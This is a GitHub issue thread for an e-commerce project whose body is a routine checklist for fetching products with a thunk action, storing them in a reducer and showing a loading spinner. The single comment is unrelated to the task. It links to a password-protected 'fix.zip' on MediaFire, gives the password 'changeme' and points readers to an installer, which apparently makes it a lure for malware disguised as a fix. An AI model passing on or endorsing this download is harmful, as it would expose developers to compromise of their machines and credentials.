### ISSUE TITLE
T13: Fetch Products

### ISSUE THREAD

**Issue by sametorbuk** [sametorbuk/E-commerce-website#15]
- [x] **Fetch products**
    - [x] by **thunk action** and save it in the `product reducer`
    - [x] endpoint `/products`
    - [x] in response you will get Object like below:

   ```js
   {
      total: 185,
      products: [
         { ProductObject1 }, 
         { ProductObject2 }, 
         …
      ]
   }
   ```
After getting response you need to 
    - [x] set total to Product Reducer
    - [x] set products to Product Reducer

- [x] You should list products in the UI (shopping page)

- [x] While fetching products data, a loading spinner should be shown on the screen

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
